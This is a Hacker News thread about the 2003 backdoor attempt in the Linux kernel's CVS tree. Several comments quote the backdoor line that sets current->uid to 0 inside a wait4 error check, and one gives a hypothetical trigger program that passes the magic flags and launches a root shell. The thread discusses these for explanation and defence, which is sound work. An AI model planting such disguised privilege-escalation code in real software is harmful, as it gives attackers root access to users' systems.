The Linux Backdoor Attempt of 2003 (freedom-to-tinker.com)
159 points by Tsiolkovsky on Oct 9, 2013 | 63 comments



Ehh. I think this article overstates just how clever this backdoor is. With the entire kernel source to play with, and the underlying assumption that the CVS change would pass into BitKeeper without a thorough review, there must have been far subtler ways to insert a local privilege escalation.

Besides, it's not as if Linux local privilege escalations are incredibly rare, and it would be surprising if anyone with enough money, time and expertise couldn't uncover them at a rate sufficient to make this kind of skulduggery unnecessary.


Hi, guy who discovered the back door here.

The flow was always BitKeeper => CVS, not CVS => BitKeeper.

The only way this change would have made it into BK is if one of the users of the CVS tree modified the same area of code and included that change in a patch sent to Linus or one of the other BK users. The chances of that happening and not being caught in review were, in my opinion, zero. Zilch. Just not possible; any reasonable programmer would have seen this.

To this day I believe this was a script kiddy who broke in and wanted to see if he could stick a trojan in there and get root on machines that installed this code. It seems dicey at best: while some people used the CVS tree at the time, all releases were done from BK, so that code would never have hit mainstream distros.


Although you might feel motivated to deride the attacker, I think it's safe to say that this person was skilled beyond "script kiddy".


I'm old, so maybe the meaning of "script kiddy" has evolved, but back in the day my understanding was that the term applied to people who did this sort of thing. Maybe I misunderstand the term; hacking into machines is certainly not my area of expertise.


To my understanding, the meaning of "script kiddie" hasn't changed much over time. It still means:

Someone who breaks into computers by merely running scripts and hacking tools written by others, without writing any code of their own and without any deep knowledge of the attack.

See also: https://en.wikipedia.org/wiki/Script_kiddie


OK, so I was wrong. Not sure what to call the person who did the backdoor then (nor why it is a big deal). But whatever, I used the wrong term, sorry.


Anyway, luckydue - nice work spotting it all those years ago, and thanks for all your effort. As a Linux user, I appreciate the work all the Linux hackers put in.


The Linux kernel guys are an impressive bunch. I've helped but I'm not in their league. I did BitKeeper to help Linus. He's a great programmer, architect, and manager, and in ~25 years in the industry I've never met another guy with his skill set.

In spite of all the shit I've taken for the choices I have made, I'd do it all over again to help Linus. That guy is unique. I know you guys like him but I think few people really realize how unique he is. He's a big deal, I am not.


What's clever about that code is that the conditional will always fail. The assignment expression setting the uid to 0 itself evaluates to 0, which causes the conjunction to evaluate to false. At first glance, the code makes you believe that the body of the conditional is necessary, when it's in fact dead code. That's nice camouflage.
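
If it helps, here's a tiny userspace sketch of the same shape, with made-up values; the branch is never entered, but the damage is done anyway:

    #include <stdio.h>

    int main(void) {
        int uid = 1000;              /* stand-in for current->uid */
        int options = 3, magic = 3;

        /* (uid = 0) assigns, then evaluates to 0, so the && is always
           false and the body is dead code; the assignment's side effect
           has already happened by then. */
        if ((options == magic) && (uid = 0))
            puts("never reached");

        printf("uid is now %d\n", uid);  /* prints: uid is now 0 */
        return 0;
    }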


I like the extra parens in the if condition. It's genius.

On the face of it, it appears that the parens are there to ensure correct operator precedence, since a bitwise OR is involved (a common idiom, because bitwise operators have surprisingly low precedence relative to comparisons in C).

But that's not what the parens are really for! They are there because gcc complains about assignments inside of conditionals unless you put an extra set of parens around them.
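
A quick demo of the warning behavior, as I remember it (exact wording varies by gcc version):

    /* build with: gcc -Wall demo.c */
    int main(void) {
        int x = 1;

        if (x = 0)      /* -Wall: "suggest parentheses around
                           assignment used as truth value" */
            return 1;

        if ((x = 0))    /* extra parens: warning suppressed; gcc
                           takes them to mean the assignment was
                           intentional */
            return 2;

        return 0;
    }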


Also clever is the fact that the first clause acts as a password, so that the backdoor opens only if called with the supposedly invalid option combination.
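
To make that concrete: here's a hypothetical sketch of what the userspace side of triggering it might have looked like, assuming the hook sat in wait4() as described. Against a clean kernel this just gets an error back.

    #define _GNU_SOURCE
    #include <sys/wait.h>
    #include <sys/resource.h>
    #include <unistd.h>

    int main(void) {
        /* the "password": a flag combination no sane program passes */
        wait4(-1, (int *)0, __WCLONE | __WALL, (struct rusage *)0);

        /* on a kernel with the backdoor, our uid would now be 0 */
        return execl("/bin/sh", "sh", (char *)0);
    }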


The hack itself is primitive (I guess most obfuscation-contest entrants have used this trick at least once), but hacking into the official CVS repository looks more suspicious. Even more so given that nobody noticed/reported the break-in.


I think I've done this "hack" several times when I started coding, and scratched my head for a while before realising I was missing an equals sign!


Hah, that's what makes this "hack" so popular: it's very easy to miss, even for seasoned programmers, when just glancing at the code.


I remember this appearing on an exam in my C class back in '89 or so. It was basically "What does this code output...", and had "if (a = 3)" instead of "if (a == 3)". Thing is, I recognized the mistake and thought the instructor had made a typo, so I answered based on what I thought the instructor had meant. Of course I got the question wrong. (I was fairly cocky back then, and normally I would have answered the question at face value just to "be that way", but I was trying to break that bad habit and it ended up backfiring on me anyway.)


  if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
> ...A casual reading by an expert would interpret this as innocuous error-checking code...

Wait... Wait... A casual reading by any expert should result in the question "why is this code setting current->uid to 0?"

After all, in case said expert has forgotten the difference between = and ==, this little bit of code all by itself has two correct reminders about what those operators actually do.


Although I noticed it, judging by the number of times I've fallen for those 'spot the error in this sentence' games, I would assume that if you're reading a lot of code and you see the 'if', you subconsciously interpret it as two equals signs.


Even better: Emacs has cwarn-mode, which by default highlights = (assignment-equal) in tests in BRIGHT RED. I'm sure Vim has something similar; maybe the customized version of uEmacs/PK 4.0.15 Linus uses does not.

http://www.emacswiki.org/emacs/CWarnMode

http://en.wikipedia.org/wiki/MicroEMACS

http://web.archive.org/web/20061124122032/http://www.stifflo...


Most IDEs do that today - but I wonder how many did that in 2003?


The author is talking down to readers and assumes too many people just learned C yesterday. An assignment of a variable called uid to 0 inside an error check is waaaay too transparent. It's impressive that it made it into the CVS server with no history, but the actual weakness relies heavily on nobody ever looking at the code. It would be spotted right away by anyone remotely competent who glanced over it.


    It would be spotted right away by anyone
    remotely competent who glanced over it.
I'm not so sure. I'm a professional programmer mostly working in C++, and I didn't see the problem on first read-through. It took looking carefully before I saw it, and if I hadn't already known that these two lines contained a vulnerability I might not have noticed. I could see this being missed in a code review.


Going back to my earlier point, its success relies on people not seeing it. So I would think its ability to pass a code review would ultimately depend on how many other lines of code it has to hide amongst. If you are reviewing a huge diff and this is hiding somewhere, then OK, maybe I buy it, but it's pretty transparently wrong.

Another test it fails: even if it were == as they are trying to make people think, why would this return EINVAL only if the user is root? There aren't a lot of real-world examples where you would want that. It pops out right away as a bogus check that makes no sense, and, surprise surprise, it also sets the uid to 0, my guess is in a place where it makes no sense to even look at uid, only superficially disguised as a "rookie mistake"...
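
That is, even the "honest" version they want you to read it as makes no sense:

  if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;

"Reject this flag combination, but only when root asks"? Nobody writes that.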


Any professional programmer should be hesitant to make claims like this: it's easy to see if you have an isolated fragment and are primed to be thinking about security. It's a much different story if you received something like this as part of a big patch and weren't making an effort to be particularly vigilant. We have such a long history of finding bugs like this that made it into production because this is an easier mistake to make than you claim.

It's easy to thump your chest and assume that you're smarter than those developers (which is almost certainly wrong), but that misses the underlying lesson: humans will make mistakes, and the likelihood goes up with the complexity of the task. The remedy can be switching to a language which bans problematic behaviour, automatic use of linters and other tools, rigorous code reviews, etc., but in each case you're making the environment safer rather than trying to find perfect developers.


I suspect you are taking my comment as a personal insult rather than reading it for the meaning I intended. The point I was trying to make is that the skill involved here was in hiding the lines in a large source tree and hiding the history. The actual lines of code are unremarkable, absurdly incorrect when taken in isolation, and not where the clever part of this attack lies. The author of the article presents it as something else.

See also my reply to cbr, where I make essentially your same point: the way to get this past a code review is to make it part of a large diff.


It's not so much a personal insult as the common tendency most people have to base decisions on best rather than average performance. This essentially comes down to the Deming/TQM/Toyota/etc. school of management, where you focus on making the system tolerate human error rather than hoping your humans consistently perform well.

That said, I do disagree that this is easily detected – I would bet that a significant percentage of C developers would not notice this if it wasn't mentioned in the context of a security problem. Linux kernel developers are [hopefully] well above average but … there's a reason why so many style guidelines feature this one prominently and it's not because few people have made this mistake.


Surprised at downvotes. Putting foo = 0 in a test for an if statement is something that even I can spot, and I am not a professional programmer and have had no formal training in programming other than an Algol 60 course at university way back in the last century.

The author of the code, if malicious, must have realised that it would not pass any kind of code review.

PS: I tend to discount 'tone' when reading blog pages as getting the 'tone' right is the kind of thing professional authors do.


As a professional programmer, I spotted the error on my first read through, but it wasn't a fair test because the code wouldn't have been there if there wasn't a problem. Had I just been scanning the code quickly without being in a state where I was alerted to look for an issue I have no idea if I would have seen it.

In any case, this is something a competent lint tool or static code analyzer would warn about, which makes a good case for people using such tools as part of their normal process.


Quite disturbing to think about. There are probably millions of lines of code in the kernel; how confidently can you say that there's no other instance of something like this slipping in? I mean, it's just one damn '=' character.


The more I think about it, the more programming (and computers in general) frustrates me. In the non-digital world, the general rule is that small mistakes lead to small consequences (for example, overcooking food will result in it burning and getting worse over time).


But not watching what you're cooking can also end with blowing up a whole building in a gas explosion. More often it's just a bad meal, of course. And likewise, more often a small mistake in a program will just result in a compile error or bad behavior.


Isn't this also what makes computers so wonderful? Small amounts of code let you do amazing things.


A piece of telco software had been written in C language, a standard language of the telco field. Within the C software was a long "do... while" construct. The "do... while" construct contained a "switch" statement. The "switch" statement contained an "if" clause. The "if" clause contained a "break." The "break" was supposed to "break" the "if clause." Instead, the "break" broke the "switch" statement.

Ctrl-F the above phrase in

http://www.mit.edu/hacker/part1.html

Security concerns always seem to involve low-level code in device drivers or firmware. Indeed, one character in the wrong place and we have problems.


Also, that statement is guaranteed to be wrong. You don't "break" if clauses. But hey, it's about hackers and on mit.edu, it must be correct :)


Yes, I thought the 'break' keyword wasn't used in if clauses. I took it to mean a problem with a line ending, resulting in the premature closure of the switch block. Anyone have any ideas as to the possible syntax?


It would make sense if the author had meant do clause instead of if clause.

Something like this:

  do {
    switch (bleh) {
      case MEH:
        if (derp) {
          break; /* supposed to exit the do..while loop early...
                    except it only exits the switch statement */
        }
        [...]
        break; /* usually there's a break at the end of each
                  case statement, but the programmer might
                  not have seen it if it's far away */
    [...]
    }
    fun_stuff(); /* not supposed to be called when
                    bleh == MEH and derp is non-null */
  } while (quux);
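
(And for completeness, the usual way to actually escape the loop from inside the switch is a goto; a minimal compilable sketch, keeping the made-up names from above:)

  #include <stdio.h>

  enum { MEH = 1 };

  static void fun_stuff(void) { puts("fun_stuff"); }

  static void process(int bleh, int derp, int quux) {
    do {
      switch (bleh) {
        case MEH:
          if (derp)
            goto done;  /* exits the do..while, not just the switch */
          break;
      }
      fun_stuff();
    } while (quux);
  done:
    ;
  }

  int main(void) {
    process(MEH, 1, 0);  /* fun_stuff() correctly skipped */
    return 0;
  }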


"how confidently can you say that there's no other instance of something like this slipping in? "

Well, you have compilers that display warnings about it. If you don't catch the error you have static analyzers; if not, you have Valgrind and other memory tools (Linux has some jewels here); and if not, you have your own parsing code to automatically check for anything suspicious, like becoming superuser.

So it's not that disturbing, as this example is something that even gcc with -Wall can catch. LLVM is better in this respect.


I wonder how many millions of dollars of damage has been done by the bone-headed equality/assignment syntax in C?


The problem is overstated, but using := (or ->, or whatever) for assignment and = for comparison hasn't ever seemed like a bad idea.


There was no shortage of non-profit, non-nation-state actors engaging in backdooring open source and commercial codebases during this time. No reason to believe this was related to the NSA.


I agree. I've worked with the NSA (early 1990s, when they still had some ethics) and this hack doesn't feel like what they would do.

I'm not an NSA expert though, I declined to get clearance, so salt my opinion a bit.


Doesn't the compiler complain about an assignment in a condition?


Only when unparenthesized (e.g., if (x = 0) { ... }, but not if ((x = 0)) { ... }). And the author of this mysterious bit of code has helpfully thrown some parentheses around the assignment...


I don't see any warnings when compiling "if (1 && (i = 2)) {...}", but there is a warning when compiling "if (i = 2) {...}". This is using gcc 4.7.2 with -Wall.


Both gcc and clang appear to lack any way to generate a warning in the first case. Something like splint (http://www.splint.org) does, which is a good argument for including it in a C developer's workflow.
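
For reference, the test case is just:

    /* test.c; try: splint test.c
       (per the above, splint flags the assignment here, while
       gcc/clang with -Wall stay quiet) */
    int main(void) {
        int i = 0;

        if (1 && (i = 2))
            return i;

        return 0;
    }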


clang and gcc don't warn on this because real large codebases have an (unfortunate?) number of assignments inside boolean expressions. Most of them are intentional and at least some significant fraction are correct.

Taking advantage of assignment-as-an-expression is idiomatic in a fair amount of code I've seen, at least.

Stuff like:

    /* check_something returns non-zero on error */
    if (need_to_check && (status = check_something())) {
        handle_error(status);
    }
The clang and gcc folk tend to avoid adding default (or even -Weverything) warnings that will trigger on entirely valid, at least marginally common code, even if the style choice is problematic.


> clang and gcc don't warn on this because real large codebases have an (unfortunate?) number of assignments inside boolean expressions

Definitely. I personally find that style bad because it's concealed a fair number of bugs in the past (either things like the =/== confusion, or simply logic errors once the line became long enough that scanning it is non-trivial). But the only way that could fly for a compiler would be as a flag or pragma letting you opt in to valid-but-discouraged style warnings, and that's served well enough by existing linters that standardization isn't worth the cost of moving it into a compiler.


This is pretty interesting, thanks for posting.


Are those options for wait4 in common use, causing auto-elevation for many programs? It seems too easily accessed to be an NSA backdoor.


We seem to have forgotten that the NSA is not the only or even necessarily the most interesting entity looking to privilege-escalate and/or steal data. Corporations and individuals are malicious also.


We still don't have a report on the kernel.org hack of 2011.

Many people say: calm down, it's git, they can't have inserted backdoors etc. without messing up the git history/changelog/hashes/whatever. But what if git was modified and backdoored beforehand to hide some objects/changes? How would such an attack work? Let's say you discover a problem in git which allows you to omit changesets in its output. How would that work to backdoor the kernel?


Older versions of git would tell you the hashes were wrong. Implementations of git in other languages would tell you the hashes were wrong. Manually checking would tell you the hashes were wrong. It's just not feasible.

EDIT: Plus, git is stored in git, so you'd need to backdoor git first... ;)



Thanks for the link... I've never read the README before, and it's very entertaining. Now I'm going to have "goddamn idiotic truckload of sh*t" echoing through my head all day


I read it when the project was introduced, but forgot it a long time ago. Goddamn Idiotic Truckload of Sh*t Hub, Inc. would make a memorable name for a corporation.


Also, the source of git would reveal a problem when examined. To get around that, one starts hypothesizing the sort of globe-spanning conspiracy against which one might as well give up ("well, maybe all my compilers (not just gcc, all of them) are also backdoored to backdoor themselves, and each other if you cross-compile, then backdoor git too...").


This summer: One man looked too deeply into the source code of his compilers and didn't like what he found.


Quickly, damon_c! To Kickstarter!


The kernel hasn't always been tracked in git though. How would we know something wasn't added before the source was imported into git?


Because before it was tracked by git, it was in bitkeeper, and it was likely in some other system before that.


I understand that. But what I don't know are the capabilities of those other, older systems that once tracked the kernel source. Do we have the same assurances there?


Great question.

BitKeeper wasn't as good as git when it comes to changesets and catching introduced bugs; still, it was founded on the more social side of changes needing approval. Before that it was CVS, and with CVS it's almost easy to introduce backdoors.


Besides the whole source-code-compromise discussion, I would really like to know whether any incident report is planned.

Until the redesign, kernel.org stated: "We will be writing up a report on the incident in the future."

But since the compromise was more than two years ago, that seems unlikely.


Such changes would be visible when comparing a locally stored tree of older sources with the new, supposedly backdoored official sources stored on github. Someone would surely notice undocumented changes while doing backports, kernel upgrades, etc. Heck, even an integrity check by 3rd-party tools could help here.



